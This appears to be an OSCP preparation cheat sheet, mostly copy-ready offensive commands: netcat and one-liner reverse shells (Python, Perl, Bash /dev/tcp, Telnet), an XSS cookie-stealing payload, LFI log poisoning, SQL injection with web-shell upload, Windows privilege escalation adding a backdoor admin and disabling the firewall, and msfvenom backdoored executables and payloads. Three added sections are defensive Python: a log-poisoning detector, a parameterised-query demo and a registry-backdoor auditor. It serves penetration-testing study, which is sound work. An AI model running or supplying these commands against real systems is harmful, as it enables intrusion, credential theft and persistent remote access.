I want to share a couple of things that I think helped me prepare for the Offensive Security Certified Professional (OSCP) certification, together with what I found useful during the labs and the exam. If you have any questions, feel free to contact me.
Don't forget to:
- Follow the courseware first and then start practicing in the labs.
- Use additional sources to learn more.
- Join the Offensive Security PWK forums and social media and talk to other people.
Tips
Enable a service on every reboot:
update-rc.d <[SERVICE]> enable
Extract links from an HTML page:
cat index.html | grep "href=" | cut -d "/" -f3 | grep "<[DOMAIN]>" | cut -d '"' -f1 | sort -u
Netcat
Interact with an application:
nc -nv <[IP]> <[PORT]>
Listener:
nc -nlvp <[PORT]>
File transfer (client, receives the file):
nc -nlvp <[PORT]> > <[FILE]>
File transfer (server, sends the file):
nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]>
Bind vs Reverse Shell

Bind Shell:
Bob needs Alice's help. Bob sets up a listener on port 4444 with the -e parameter:
(BOB): nc -nlvp <[PORT]> -e cmd.exe
(ALICE): nc -nv <[BOB_IP]> <[PORT]>
Reverse Shell:
Alice needs Bob's help. Since Alice is behind a firewall, it is impossible for Bob to reach Alice. So Alice creates a reverse shell:
(ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash
(BOB): nc -nlvp <[PORT]>
Zone Transfer
dnsrecon -t axfr -d <[DOMAIN]>
Nmap
nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]>
SMB
nbtscan <[SUBNET]>
nmap -p139,445 --script smb-enum-users <[SUBNET]>
nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]>
enum4linux <[IP]>
smbclient -L <[IP]> -N
smbclient //<[IP]>/<[SHARE]> -N
SMTP
nmap -p25 <[SUBNET]> --open
nc -nv <[IP]> 25
VRFY <[USERNAME]>
SNMP
Steps: nmap scan of UDP 161, create a target IP list, create a community-string list file, use onesixtyone + snmpwalk.
nmap -sU --open -p161 <[SUBNET]>
onesixtyone -c community -i <[SNMP_IP_LIST]>
snmpwalk -c public -v1 <[IP]> <[MIB_VALUE]>
MIB values (for snmpwalk):
1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User
1.3.6.1.2.1.6.13.1.3 TCP Local Ports
File Transfer Linux
Netcat:
On victim machine (client, receives the file): nc -nlvp 4444 > <[FILE]>
On attacker machine (server, sends the file): nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]>
Curl:
curl -O http://<[IP]>/<[FILE]>
Wget:
wget http://<[IP]>/<[FILE]>
Recursive wget FTP download:
wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]>
File Transfer Windows
TFTP (installed by default up to Windows XP and 2003; on Windows 7, 2008 and above it has to be added explicitly. For this reason TFTP is not the ideal file transfer protocol in most situations.)
On attacker machine:
mkdir tftp
atftpd --daemon --port 69 tftp
cp <[FILE]> tftp
On victim machine shell:
tftp -i <[IP]> GET <[FILE]>
FTP (Windows operating systems include a default FTP client that can also be used for file transfer)
On attacker machine:
(ONE-TIME) Install an FTP server:
apt-get install pure-ftpd
(ONE-TIME) Create a new user for PureFTPD (see the script setup-ftp.sh) (USER demo, PASS demo1234):
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd demo -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome
/etc/init.d/pure-ftpd restart
(ONE-TIME) chmod 755 setup-ftp.sh
On victim machine shell:
echo open <[IP]> 21 > ftp.txt
echo USER demo >> ftp.txt
echo demo1234 >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
VBScript (in Windows XP, 2003)
On victim machine shell:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs & echo StrFile = WScript.Arguments.Item(1) >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs & echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs & echo Err.Clear >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs & echo http.Open "GET", strURL, False >> wget.vbs & echo http.Send >> wget.vbs & echo varByteArray = http.ResponseBody >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs & echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs & echo strData = "" >> wget.vbs & echo strBuffer = "" >> wget.vbs & echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs & echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs & echo Next >> wget.vbs & echo ts.Close >> wget.vbs
cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]>
PowerShell (in Windows 7, 2008 and above)
On victim machine shell:
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1
echo $file = "evil.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Debug.exe utility (32-bit Windows only; works only for files < 64 KB)
On attacker machine:
cp <[FILE]> .
upx -9 <[FILE]> (for compression)
cp /usr/share/windows-binaries/exe2bat.exe .
wine exe2bat <[FILE]> <[FILE.txt]>
On victim machine:
Paste the content of <[FILE.txt]>
XSS
Steal a cookie via XSS:
On attacker machine, set up a listener (nc -nlvp <[PORT]>).
On the victim website:
<script>new Image().src="http://<[IP]>:<[PORT]>/test.php?output="+document.cookie;</script>
LFI/RFI
Connect via netcat to the victim (nc -nv <[IP]> <[PORT]>) and send <?php echo shell_exec($_GET['cmd']);?>, so that it ends up in the web server's access log; then try to include the log file for code execution:
&cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log
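From the defender's side, the log-poisoning technique above leaves two traces in the same access log: a request carrying a PHP tag (the poisoning) and a later request whose parameter traverses to access.log (the inclusion). The following is an added detection example, not code from the original post; the log lines are constructed, and the indicator names are my own.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not real traffic). Line 2 plants PHP in the
# log via the request line, line 3 includes that log through a traversal in LANG,
# line 4 carries the PHP tag in the User-Agent and a URL-encoded traversal.
SAMPLE_LOG = """\
10.11.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /<?php echo shell_exec($_GET['cmd']);?> HTTP/1.1" 404 209 "-" "Mozilla/5.0"
10.11.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?cmd=whoami&LANG=../../../../../../../xampp/apache/logs/access.log HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
10.11.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?LANG=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1803 "-" "<?php echo shell_exec($_GET['cmd']);?>"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)
TRAVERSAL = re.compile(r'(\.\.[/\\]){2,}')
LOG_TARGET = re.compile(r'(access|error)\.log', re.IGNORECASE)

def classify(line):
    """Return the indicator names raised by one log line (empty list if it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # URL-decode so %2F-style encodings of ../ are seen as traversal too.
    req, ref, ua = (unquote(m.group(g)) for g in ('req', 'ref', 'ua'))
    hits = []
    if any(PHP_TAG.search(field) for field in (req, ref, ua)):
        hits.append('php_tag_in_request')      # poisoning: code written into the log file
    if TRAVERSAL.search(req):
        hits.append('path_traversal')
        if LOG_TARGET.search(req):
            hits.append('log_file_include')     # traversal aimed at the server's own log
    return hits

def scan(log_text):
    """Aggregate indicators per source IP: {ip: {indicator, ...}} for suspicious lines only."""
    findings = {}
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            findings.setdefault(LOG_RE.match(line).group('ip'), set()).update(hits)
    return findings
```

An IP that raises both php_tag_in_request and log_file_include within a short window is the strongest signal; either alone is worth a look.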
SQL Injection
Base:
any' or 1=1 limit 1;--
Number of columns:
order by 1, order by 2, ...
Expose data from the database:
UNION select 1,2,3,4,5,6
Enumerate tables:
UNION select 1,2,3,4,table_name,6 FROM information_schema.tables
Shell upload:
<[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 union select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php'
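To see why the base payload works and what stops it, here is an added example (not from the original post) that runs any' or 1=1 limit 1;-- against a string-built query and against a parameterised one, on a constructed in-memory SQLite table; the table contents and function names are mine.

```python
import sqlite3

# Constructed sample table for the demo; no real credentials.
USERS = [('alice', 'correct horse'), ('bob', 'battery staple')]
PAYLOAD = "any' or 1=1 limit 1;--"   # the base injection string from the cheat sheet

def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)')
    conn.executemany('INSERT INTO users (username, password) VALUES (?, ?)', USERS)
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: user input becomes part of the SQL text.
    With PAYLOAD the WHERE clause turns into  username = 'any' or 1=1 limit 1
    and everything after ;-- is a comment, so the first user is returned."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterised query: the same input is bound as a plain string value."""
    sql = 'SELECT username FROM users WHERE username = ? AND password = ?'
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def demo():
    """Run both versions against the injection payload and a legitimate login."""
    conn = make_db()
    return {
        'vulnerable_with_payload': login_vulnerable(conn, PAYLOAD, 'wrong'),
        'safe_with_payload': login_safe(conn, PAYLOAD, 'wrong'),
        'safe_legit': login_safe(conn, 'alice', 'correct horse'),
    }
```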
Buffer Overflow
/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]>
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <[ADDRESS]>
Privilege Escalation
Vulnerable services:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
sc qc <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= ""
sc config <[VULNERABLE_SERVICE]> start= "auto"
sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrators hacker /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
Win10:
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
Then press Ctrl+Alt+Del and start the on-screen keyboard.
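The osk.exe Debugger trick above leaves a durable artefact under Image File Execution Options that is easy to audit. This added example (not from the original post) parses the text that reg query prints for that key with /s and reports every image that has a Debugger value; the reg output below is constructed, and the helper names are mine.

```python
import re

IFEO_ROOT = r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Constructed sample of `reg query "<IFEO root>" /s` output (not from a real host):
# a filter flag on the root, a legitimate mitigation setting on notepad.exe, and osk.exe hijacked.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
    UseFilter    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
    MitigationOptions    REG_QWORD    0x100

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe
    Debugger    REG_SZ    cmd.exe
"""

VALUE_RE = re.compile(r'^\s{2,}(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$')

def parse_reg_query(text):
    """Parse `reg query ... /s` output into {key_path: {value_name: (type, data)}}."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith('HKEY_'):          # key paths are printed flush left
            current = line.strip()
            keys[current] = {}
        elif current is not None:             # values are printed indented under their key
            m = VALUE_RE.match(line)
            if m:
                keys[current][m.group('name')] = (m.group('type'), m.group('data').strip())
    return keys

def find_ifeo_debuggers(reg_text):
    """Return [(image_name, debugger_command)] for every IFEO subkey that sets Debugger."""
    findings = []
    prefix = IFEO_ROOT.lower() + '\\'
    for path, values in parse_reg_query(reg_text).items():
        if not path.lower().startswith(prefix):
            continue                          # the root key itself or an unrelated key
        image = path.rsplit('\\', 1)[-1]
        for name, (_type, data) in values.items():
            if name.lower() == 'debugger':    # registry value names are case-insensitive
                findings.append((image, data))
    return findings
```

On a live host, feed it the output of reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s; a Debugger value on any accessibility binary, not only osk.exe, deserves the same scrutiny.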
Pass the hash
export SMBHASH=<[HASH]>
pth-winexe -U administrator% //<[IP]> cmd
Cracking
Medusa:
medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC):
ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
Firewall
Enable Remote Desktop:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service remotedesktop enable
Enable Remote Assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Disable firewall:
netsh firewall set opmode disable
One-shot ninja combo (new admin user, firewall off + RDP):
set CMD "net user hacker Hacker123 /add & net localgroup administrators hacker /add & net localgroup \"Remote Desktop Users\" hacker /add & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable"
Backdooring EXE Files
msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o <[FILE_NAME]>
Binary payloads
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]>
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]>
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]>
Web payloads
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]>
cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]>
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]>
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]>
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f war > <[FILE_NAME.war]>
Scripting Payloads
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]>
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]>
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]>
Shellcode
For all shellcode, see 'msfvenom --help-formats' for information on valid parameters. Msfvenom will output code that can be cut and pasted into the chosen language for your exploits.
Linux based shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Windows based shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Mac based shellcode:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Staged vs Non-Staged Payloads
Staged payload (useful for BOF; needs a Metasploit multi/handler in order to work), e.g. windows/shell/reverse_tcp:
msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]>
Non-staged payload (works with a netcat listener), e.g. windows/shell_reverse_tcp:
msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]>
Handlers
Metasploit handlers are great for quickly setting up Metasploit to receive your incoming shells. Handlers should be in the following format:
use exploit/multi/handler
set PAYLOAD <[PAYLOAD_NAME]>
set LHOST <[IP]>
set LPORT <[PORT]>
set ExitOnSession false
exploit -j -z
Shell Spawning
Python:
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bash:
echo os.system('/bin/bash')
/bin/sh -i
exec 5<>/dev/tcp/<[IP]>/<[PORT]>
cat <&5 | while read line; do $line 2>&5 >&5; done
Perl:
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Telnet:
mknod /tmp/yyy p && /bin/bash 0</tmp/yyy | telnet <[IP]> <[PORT]> 1>/tmp/yyy
Ruby:
ruby: exec "/bin/sh"
Lua:
lua: os.execute('/bin/sh')
From within IRB:
exec "/bin/sh"
From within vi:
:!bash
From within vi:
:set shell=/bin/bash:shell
From within nmap:
!sh